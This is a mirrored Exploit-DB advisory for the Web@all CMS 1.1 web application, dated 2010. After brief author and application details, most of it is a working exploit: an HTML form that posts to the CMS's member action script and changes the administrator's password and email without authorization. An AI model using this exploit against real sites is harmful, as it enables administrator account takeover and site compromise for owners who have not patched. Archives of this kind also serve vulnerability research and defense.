Web@all 1.1 – Remote Admin Settings Change - 体验盒子

作者： Giuseppe D'Inverno
日期： 2010-12-27
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/15837/
===========================================
Web@all <= 1.1 Remote Admin Settings Change
===========================================

Author___: giudinvx
Email____: <giudinvx[at]gmail[dot]com>
Date_____: 27/12/2010
Site_____: http://www.giudinvx.altervista.org/
--------------------------------------------------------
Application Info:
web@all 1.1
web@all is a CMS which is not similar to general CMS,
you can build it easyly by yourself.
www.webatall.com
--------------------------------------------------------

==============[[ -Exploit Code- ]]==============

<html>
<form method="post" enctype="multipart/form-data"
action="[localhost]mem/action.php" name="f1">
Change Admin user, password and email.<br/>
Password<input type="text" value="" name="password"><br/>
Password<input type="text" value="" name="answer"><br/>
Email<input type="text" value="" name="email">
<input type="hidden" value="Admin" name="nickname">
<input type="hidden" value="" name="question">
<input type="hidden" value="" name="sign">
<input type="hidden" value="" name="person[firstname]">
<input type="hidden" value="" name="person[lastname]">
<input type="hidden" value="" name="person[country]">
<input type="hidden" value="" name="person[province]">
<input type="hidden" value="" name="person[city]">
<input type="hidden" value="" name="person[address]">
<input type="hidden" value="" name="person[zip]">
<input type="hidden" value="" name="person[mobile]">
<input type="hidden" value="" name="person[phone]">
<input type="hidden" value="" name="person[other]">
<input type="hidden" value="member" name="_lib">
<input type="hidden" value="member" name="_file">
<input type="hidden" value="person" name="memtype">
<input type="hidden" value="do_edit" name="_act">
<input type="submit" value="Submit">
</form>
</html>